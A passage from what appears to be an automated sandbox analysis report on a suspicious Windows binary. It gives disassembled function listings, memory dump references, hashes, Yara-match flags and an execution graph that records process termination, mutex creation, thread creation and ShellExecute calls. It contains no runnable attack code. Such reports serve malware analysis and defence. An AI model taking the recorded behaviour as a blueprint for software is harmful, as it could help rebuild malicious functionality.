                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                    • Opcode ID: 137f169b6c25b7845aed2cc94b91353c24f34a4c1c4ed61872286f129e9dac20
                                                                                                                                                    • Instruction ID: 8636e9a44b0eaf4944e6e771d4cfcf09712e08d79ae085e316e9fe05382acfd6
                                                                                                                                                    • Opcode Fuzzy Hash: 137f169b6c25b7845aed2cc94b91353c24f34a4c1c4ed61872286f129e9dac20
                                                                                                                                                    • Instruction Fuzzy Hash: EE31C931600289EFDB20DFA4C884AFE7BE5AF01310F1445AAE665EB2A5D734DD80DB55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AF629 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                    • Opcode ID: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
                                                                                                                                                    • Instruction ID: 01841cb3a98dbfeb2bb3fe6c4c50cda1050f5b4862346ebf9581c52a54657b8e
                                                                                                                                                    • Opcode Fuzzy Hash: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
                                                                                                                                                    • Instruction Fuzzy Hash: B211457240014ABBCF125EC5CC418EE3F72BB2D354B548426FA5899131C73AC976AB85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 022B1359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                    • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                    • Instruction ID: 4a7a78a3e1cec30622d0951e0ba7fbd86f4890a0d9c3fd2f3ea5a9450479b3fc
                                                                                                                                                    • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                    • Instruction Fuzzy Hash: 2301393242024ABBCF135EC4DC218EE3F62BF19394B488415FA5998438E376C5B1AB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02337A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 02337A4B
                                                                                                                                                      • Part of subcall function 02338140: ___BuildCatchObjectHelper.LIBCMT ref: 02338172
                                                                                                                                                      • Part of subcall function 02338140: ___AdjustPointer.LIBCMT ref: 02338189
                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 02337A62
                                                                                                                                                    • ___FrameUnwindToState.LIBCMT ref: 02337A74
                                                                                                                                                    • CallCatchBlock.LIBCMT ref: 02337A98
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2901542994-0
                                                                                                                                                    • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                    • Instruction ID: 246073bdd8047b0e350e7de584c6e6efd063fc8befe1018b4329495140abd839
                                                                                                                                                    • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                    • Instruction Fuzzy Hash: D3011732400109BBCF23AF55CC01EEA7BBAEF48754F148014F91866220C332EAA1DFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418B58 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00418B66
                                                                                                                                                      • Part of subcall function 0040AFF5: __set_error_mode.LIBCMT ref: 0040AFF7
                                                                                                                                                      • Part of subcall function 0040AFF5: __set_error_mode.LIBCMT ref: 0040B004
                                                                                                                                                      • Part of subcall function 0040AFF5: __NMSG_WRITE.LIBCMT ref: 0040B01C
                                                                                                                                                      • Part of subcall function 0040AFF5: __NMSG_WRITE.LIBCMT ref: 0040B026
                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 00418B6D
                                                                                                                                                      • Part of subcall function 0040AE24: __set_error_mode.LIBCMT ref: 0040AE55
                                                                                                                                                      • Part of subcall function 0040AE24: __set_error_mode.LIBCMT ref: 0040AE66
                                                                                                                                                      • Part of subcall function 0040AE24: _strcpy_s.LIBCMT ref: 0040AE9A
                                                                                                                                                      • Part of subcall function 0040AE24: __invoke_watson.LIBCMT ref: 0040AEAB
                                                                                                                                                      • Part of subcall function 0040AE24: GetModuleFileNameA.KERNEL32(00000000,004BB5A1,00000104,00402E6D,0040115A), ref: 0040AEC7
                                                                                                                                                      • Part of subcall function 0040AE24: _strcpy_s.LIBCMT ref: 0040AEDC
                                                                                                                                                      • Part of subcall function 0040AE24: __invoke_watson.LIBCMT ref: 0040AEEF
                                                                                                                                                      • Part of subcall function 0040AE24: _strlen.LIBCMT ref: 0040AEF8
                                                                                                                                                      • Part of subcall function 0040AE24: _strlen.LIBCMT ref: 0040AF05
                                                                                                                                                      • Part of subcall function 0040AE24: __invoke_watson.LIBCMT ref: 0040AF32
                                                                                                                                                      • Part of subcall function 0040AAD4: ___crtCorExitProcess.LIBCMT ref: 0040AADC
                                                                                                                                                      • Part of subcall function 0040AAD4: ExitProcess.KERNEL32 ref: 0040AAE5
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?), ref: 00418B99
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?), ref: 00418BC9
                                                                                                                                                      • Part of subcall function 00418B09: __lock.LIBCMT ref: 00418B26
                                                                                                                                                      • Part of subcall function 00418B09: ___sbh_alloc_block.LIBCMT ref: 00418B31
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __set_error_mode$__invoke_watson$AllocExitHeapProcess_strcpy_s_strlen$FileModuleName___crt___sbh_alloc_block__lock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 913549098-0
                                                                                                                                                    • Opcode ID: 8806818e76c6e35e2331d630635f3ec4a43bf9f0e7314bfc8a766d44f34329bb
                                                                                                                                                    • Instruction ID: a0d27e300ad40a63f09a7f97e10558bf2db3362a534686a9ddcf6c61e6bb9b8f
                                                                                                                                                    • Opcode Fuzzy Hash: 8806818e76c6e35e2331d630635f3ec4a43bf9f0e7314bfc8a766d44f34329bb
                                                                                                                                                    • Instruction Fuzzy Hash: 16F0C8729496156BDA206725AC05FE63758EF04739F20013FFC18AA6D1EFA8ACD096CD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BF03 Relevance: 6.0, APIs: 4, Instructions: 34memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?), ref: 0040BF31
                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 0040BF41
                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BF5E
                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 0040BF68
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap$DestroyVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 765507482-0
                                                                                                                                                    • Opcode ID: 9eea7b1fc2a66e0ea270170f9b822e170dd0a6683e2a2fe91244fe2c2d1a1cb0
                                                                                                                                                    • Instruction ID: 8563835bc216a4863905ab72e2070b212686a41036134047ebbf5baa04716464
                                                                                                                                                    • Opcode Fuzzy Hash: 9eea7b1fc2a66e0ea270170f9b822e170dd0a6683e2a2fe91244fe2c2d1a1cb0
                                                                                                                                                    • Instruction Fuzzy Hash: A3F01D36900110AFD7215F59FC45B597725FB4471DF25827AE640A21B1E7B23814CF9C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CC67 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd.LIBCMT ref: 0040CC73
                                                                                                                                                      • Part of subcall function 0040BB7E: __getptd_noexit.LIBCMT ref: 0040BB81
                                                                                                                                                      • Part of subcall function 0040BB7E: __amsg_exit.LIBCMT ref: 0040BB8E
                                                                                                                                                    • __getptd.LIBCMT ref: 0040CC8A
                                                                                                                                                    • __amsg_exit.LIBCMT ref: 0040CC98
                                                                                                                                                    • __lock.LIBCMT ref: 0040CCA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3521780317-0
                                                                                                                                                    • Opcode ID: 9254e704fb4607b28846e2f97d8f4331fbe1abc781779e55a1d5257543732ba0
                                                                                                                                                    • Instruction ID: 6f61371fcdc0662860f5ce4f102b4b604eb56e648bde0d41befb7e0540a19224
                                                                                                                                                    • Opcode Fuzzy Hash: 9254e704fb4607b28846e2f97d8f4331fbe1abc781779e55a1d5257543732ba0
                                                                                                                                                    • Instruction Fuzzy Hash: 01F06D72948300DBE661FBB6D446B4A73A0AF00728F14427FE548B72D1CB3CA800DA5E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411E44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00411E54
                                                                                                                                                      • Part of subcall function 00401FC1: __getptd.LIBCMT ref: 00401FD4
                                                                                                                                                    • __iswctype_l.LIBCMT ref: 00411EBF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Locale$UpdateUpdate::___getptd__iswctype_l
                                                                                                                                                    • String ID: $
                                                                                                                                                    • API String ID: 2516049255-3993045852
                                                                                                                                                    • Opcode ID: 3ba15b145f46a7e6a2c0d48f876a07bc695cf9f36c9dcb10e21930d579779965
                                                                                                                                                    • Instruction ID: 9968255e3f656c101b00a3d3a5cd612fd2af656b264f4d24f5a97da5e1e4913a
                                                                                                                                                    • Opcode Fuzzy Hash: 3ba15b145f46a7e6a2c0d48f876a07bc695cf9f36c9dcb10e21930d579779965
                                                                                                                                                    • Instruction Fuzzy Hash: DE61C33190420ADADF20DF58C5457EF7BA0EF01364F50022BEE51A62A0D3788EE6D79E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:2.5%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:29.8%
                                                                                                                                                    Total number of Nodes:897
                                                                                                                                                    Total number of Limit Nodes:95
                                                                                                                                                    execution_graph 39601 40a290 39606 41cc50 39601->39606 39615 423b4c 39606->39615 39608 41cc5d 39609 40a299 39608->39609 39625 44f1bb 59 API calls 3 library calls 39608->39625 39612 4219ac 39609->39612 39660 4218b0 39612->39660 39614 40a2a8 39617 423b54 39615->39617 39618 423b6e 39617->39618 39620 423b72 std::exception::exception 39617->39620 39626 420c62 39617->39626 39643 42793d DecodePointer 39617->39643 39618->39608 39644 430eca RaiseException 39620->39644 39622 423b9c 39645 430d91 58 API calls _free 39622->39645 39624 423bae 39624->39608 39627 420cdd 39626->39627 39634 420c6e 39626->39634 39654 42793d DecodePointer 39627->39654 39629 420ce3 39655 425208 58 API calls __getptd_noexit 39629->39655 39632 420ca1 RtlAllocateHeap 39632->39634 39642 420cd5 39632->39642 39634->39632 39635 420c79 39634->39635 39636 420cc9 39634->39636 39640 420cc7 39634->39640 39651 42793d DecodePointer 39634->39651 39635->39634 39646 427f51 58 API calls 2 library calls 39635->39646 39647 427fae 58 API calls 8 library calls 39635->39647 39648 427b0b 39635->39648 39652 425208 58 API calls __getptd_noexit 39636->39652 39653 425208 58 API calls __getptd_noexit 39640->39653 39642->39617 39643->39617 39644->39622 39645->39624 39646->39635 39647->39635 39656 427ad7 GetModuleHandleExW 39648->39656 39651->39634 39652->39640 39653->39642 39654->39629 39655->39642 39657 427af0 GetProcAddress 39656->39657 39658 427b07 ExitProcess 39656->39658 39657->39658 39659 427b02 39657->39659 39659->39658 39661 4218bc _raise 39660->39661 39668 427dfc 39661->39668 39667 4218e3 _raise 39667->39614 39685 428af7 39668->39685 39670 4218c5 39671 4218f4 DecodePointer DecodePointer 39670->39671 39672 4218d1 39671->39672 39673 421921 39671->39673 39682 4218ee 39672->39682 39673->39672 39694 42a78d 59 API calls __cftof_l 39673->39694 39675 421984 EncodePointer EncodePointer 39675->39672 39676 421933 39676->39675 39677 421958 39676->39677 39695 428d25 61 API calls __realloc_crt 39676->39695 39677->39672 39680 421972 EncodePointer 39677->39680 39696 428d25 61 API calls __realloc_crt 39677->39696 39680->39675 39681 42196c 39681->39672 39681->39680 39697 427e05 39682->39697 39686 428b1b EnterCriticalSection 39685->39686 39687 428b08 39685->39687 39686->39670 39692 428b9f 58 API calls 10 library calls 39687->39692 39689 428b0e 39689->39686 39693 427c2e 58 API calls 3 library calls 39689->39693 39692->39689 39694->39676 39695->39677 39696->39681 39700 428c81 LeaveCriticalSection 39697->39700 39699 4218f3 39699->39667 39700->39699 39701 423f84 39702 423f90 _raise 39701->39702 39738 432603 GetStartupInfoW 39702->39738 39704 423f95 39740 4278d5 GetProcessHeap 39704->39740 39706 423fed 39707 423ff8 39706->39707 40070 42411a 58 API calls 3 library calls 39706->40070 39741 425141 39707->39741 39710 423ffe 39711 424009 __RTC_Initialize 39710->39711 40071 42411a 58 API calls 3 library calls 39710->40071 39762 428754 39711->39762 39714 424018 39715 424024 GetCommandLineW 39714->39715 40072 42411a 58 API calls 3 library calls 39714->40072 39781 43235f GetEnvironmentStringsW 39715->39781 39718 424023 39718->39715 39721 42403e 39722 424049 39721->39722 40073 427c2e 58 API calls 3 library calls 39721->40073 39791 4321a1 39722->39791 39726 42405a 39805 427c68 39726->39805 39729 424062 39730 42406d __wwincmdln 39729->39730 40075 427c2e 58 API calls 3 library calls 39729->40075 39811 419f90 39730->39811 39733 424081 39734 424090 39733->39734 40067 427f3d 39733->40067 40076 427c59 58 API calls _doexit 39734->40076 39737 424095 _raise 39739 432619 39738->39739 39739->39704 39740->39706 40077 427d6c 36 API calls 2 library calls 39741->40077 39743 425146 40078 428c48 InitializeCriticalSectionAndSpinCount __ioinit 39743->40078 39745 42514b 39746 42514f 39745->39746 40080 4324f7 TlsAlloc 39745->40080 40079 4251b7 61 API calls 2 library calls 39746->40079 39749 425154 39749->39710 39750 425161 39750->39746 39751 42516c 39750->39751 40081 428c96 39751->40081 39754 4251ae 40089 4251b7 61 API calls 2 library calls 39754->40089 39757 42518d 39757->39754 39759 425193 39757->39759 39758 4251b3 39758->39710 40088 42508e 58 API calls 4 library calls 39759->40088 39761 42519b GetCurrentThreadId 39761->39710 39763 428760 _raise 39762->39763 39764 428af7 __lock 58 API calls 39763->39764 39765 428767 39764->39765 39766 428c96 __calloc_crt 58 API calls 39765->39766 39767 428778 39766->39767 39768 4287e3 GetStartupInfoW 39767->39768 39769 428783 _raise @_EH4_CallFilterFunc@8 39767->39769 39775 4287f8 39768->39775 39778 428927 39768->39778 39769->39714 39770 4289ef 40103 4289ff LeaveCriticalSection _doexit 39770->40103 39772 428c96 __calloc_crt 58 API calls 39772->39775 39773 428974 GetStdHandle 39773->39778 39774 428987 GetFileType 39774->39778 39775->39772 39777 428846 39775->39777 39775->39778 39776 42887a GetFileType 39776->39777 39777->39776 39777->39778 40101 43263e InitializeCriticalSectionAndSpinCount 39777->40101 39778->39770 39778->39773 39778->39774 40102 43263e InitializeCriticalSectionAndSpinCount 39778->40102 39782 432370 39781->39782 39783 424034 39781->39783 40104 428cde 58 API calls 2 library calls 39782->40104 39787 431f64 GetModuleFileNameW 39783->39787 39785 432396 ___crtGetEnvironmentStringsW 39786 4323ac FreeEnvironmentStringsW 39785->39786 39786->39783 39788 431f98 _wparse_cmdline 39787->39788 39790 431fd8 _wparse_cmdline 39788->39790 40105 428cde 58 API calls 2 library calls 39788->40105 39790->39721 39792 4321ba __W_Getmonths_l 39791->39792 39796 42404f 39791->39796 39793 428c96 __calloc_crt 58 API calls 39792->39793 39801 4321e3 __W_Getmonths_l 39793->39801 39794 43223a 40107 420bed 58 API calls 2 library calls 39794->40107 39796->39726 40074 427c2e 58 API calls 3 library calls 39796->40074 39797 428c96 __calloc_crt 58 API calls 39797->39801 39798 43225f 40108 420bed 58 API calls 2 library calls 39798->40108 39801->39794 39801->39796 39801->39797 39801->39798 39802 432276 39801->39802 40106 42962f 58 API calls __cftof_l 39801->40106 40109 4242fd IsProcessorFeaturePresent 39802->40109 39804 432282 39807 427c74 __IsNonwritableInCurrentImage 39805->39807 40132 43aeb5 39807->40132 39808 427c92 __initterm_e 39809 4219ac __cinit 67 API calls 39808->39809 39810 427cb1 _doexit __IsNonwritableInCurrentImage 39808->39810 39809->39810 39810->39729 39812 419fa0 __write_nolock 39811->39812 40135 40cf10 39812->40135 39814 419fb0 39815 419fc4 GetCurrentProcess GetLastError SetPriorityClass 39814->39815 39816 419fb4 39814->39816 39817 419fe4 GetLastError 39815->39817 39818 419fe6 39815->39818 40359 4124e0 109 API calls _memset 39816->40359 39817->39818 40149 41d3c0 39818->40149 39820 419fb9 39820->39733 39823 41a022 40152 41d340 39823->40152 39824 41b669 40440 44f23e 59 API calls 2 library calls 39824->40440 39826 41b673 40441 44f23e 59 API calls 2 library calls 39826->40441 39831 41a065 40157 413a90 39831->40157 39835 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 39836 41a33d GlobalFree 39835->39836 39851 41a196 39835->39851 39837 41a354 39836->39837 39838 41a45c 39836->39838 39840 412220 76 API calls 39837->39840 40213 412220 39838->40213 39839 41a100 39839->39835 39842 41a359 39840->39842 39844 41a466 39842->39844 40228 40ef50 39842->40228 39843 41a1cc lstrcmpW lstrcmpW 39843->39851 39844->39733 39846 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 39846->39851 39847 420235 60 API calls _TranslateName 39847->39851 39848 41a48f 39850 41a4ef 39848->39850 40233 413ea0 39848->40233 39853 411cd0 92 API calls 39850->39853 39851->39836 39851->39843 39851->39846 39851->39847 39852 41a361 39851->39852 40173 423c92 39852->40173 39855 41a563 39853->39855 39888 41a5db 39855->39888 40254 414690 39855->40254 39857 41a395 OpenProcess 39859 41a402 39857->39859 39860 41a3a9 WaitForSingleObject CloseHandle 39857->39860 40176 411cd0 39859->40176 39860->39859 39865 41a3cb 39860->39865 39861 41a6f9 40361 411a10 8 API calls 39861->40361 39862 41a5a9 39867 414690 59 API calls 39862->39867 39877 41a3e2 GlobalFree 39865->39877 39878 41a3d4 Sleep 39865->39878 40360 411ab0 PeekMessageW DispatchMessageW PeekMessageW 39865->40360 39866 41a6fe 39869 41a8b6 CreateMutexA 39866->39869 39870 41a70f 39866->39870 39873 41a5d4 39867->39873 39868 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 39874 41a451 39868->39874 39876 41a8ca 39869->39876 39875 41a7dc 39870->39875 39886 40ef50 58 API calls 39870->39886 39872 41a624 GetVersion 39872->39861 39879 41a632 lstrcpyW lstrcatW lstrcatW 39872->39879 40277 40d240 CoInitialize 39873->40277 39874->39733 39880 40ef50 58 API calls 39875->39880 39882 40ef50 58 API calls 39876->39882 39883 41a3f7 39877->39883 39878->39857 39884 41a674 _memset 39879->39884 39885 41a7ec 39880->39885 39891 41a8da 39882->39891 39883->39733 39889 41a6b4 ShellExecuteExW 39884->39889 39887 41a7f1 lstrlenA 39885->39887 39893 41a72f 39886->39893 39890 420c62 _malloc 58 API calls 39887->39890 39888->39861 39888->39866 39888->39869 39888->39872 39889->39866 39912 41a6e3 39889->39912 39892 41a810 _memset 39890->39892 39894 413ea0 59 API calls 39891->39894 39907 41a92f 39891->39907 39896 41a81e MultiByteToWideChar lstrcatW 39892->39896 39895 413ea0 59 API calls 39893->39895 39898 41a780 39893->39898 39894->39891 39895->39893 39896->39887 39897 41a847 lstrlenW 39896->39897 39899 41a8a0 CreateMutexA 39897->39899 39900 41a856 39897->39900 39901 41a792 39898->39901 39902 41a79c CreateThread 39898->39902 39899->39876 40363 40e760 95 API calls 39900->40363 40362 413ff0 59 API calls ___crtGetEnvironmentStringsW 39901->40362 39902->39875 39906 41a7d0 39902->39906 40740 41dbd0 95 API calls 4 library calls 39902->40740 39905 41a860 CreateThread WaitForSingleObject 39905->39899 40739 41e690 203 API calls 8 library calls 39905->40739 39906->39875 40364 415c10 39907->40364 39909 41a98c 40379 412840 60 API calls 39909->40379 39911 41a997 40380 410fc0 93 API calls 4 library calls 39911->40380 39912->39733 39914 41a9ab 39915 41a9c2 lstrlenA 39914->39915 39915->39912 39916 41a9d8 39915->39916 39917 415c10 59 API calls 39916->39917 39918 41aa23 39917->39918 40381 412840 60 API calls 39918->40381 39920 41aa2e lstrcpyA 39923 41aa4b 39920->39923 39922 415c10 59 API calls 39924 41aa90 39922->39924 39923->39922 39925 40ef50 58 API calls 39924->39925 39926 41aaa0 39925->39926 39927 413ea0 59 API calls 39926->39927 39928 41aaf5 39926->39928 39927->39926 40382 413ff0 59 API calls ___crtGetEnvironmentStringsW 39928->40382 39930 41ab1d 40383 412900 39930->40383 39932 40ef50 58 API calls 39934 41abc5 39932->39934 39933 41ab28 _memmove 39933->39932 39935 413ea0 59 API calls 39934->39935 39936 41ac1e 39934->39936 39935->39934 40388 413ff0 59 API calls ___crtGetEnvironmentStringsW 39936->40388 39938 41ac46 39939 412900 60 API calls 39938->39939 39941 41ac51 _memmove 39939->39941 39940 40ef50 58 API calls 39942 41acee 39940->39942 39941->39940 39943 413ea0 59 API calls 39942->39943 39944 41ad43 39942->39944 39943->39942 40389 413ff0 59 API calls ___crtGetEnvironmentStringsW 39944->40389 39946 41ad6b 39947 412900 60 API calls 39946->39947 39950 41ad76 _memmove 39947->39950 39948 415c10 59 API calls 39949 41ae2a 39948->39949 40390 413580 59 API calls 39949->40390 39950->39948 39952 41ae3c 39953 415c10 59 API calls 39952->39953 39954 41ae76 39953->39954 40391 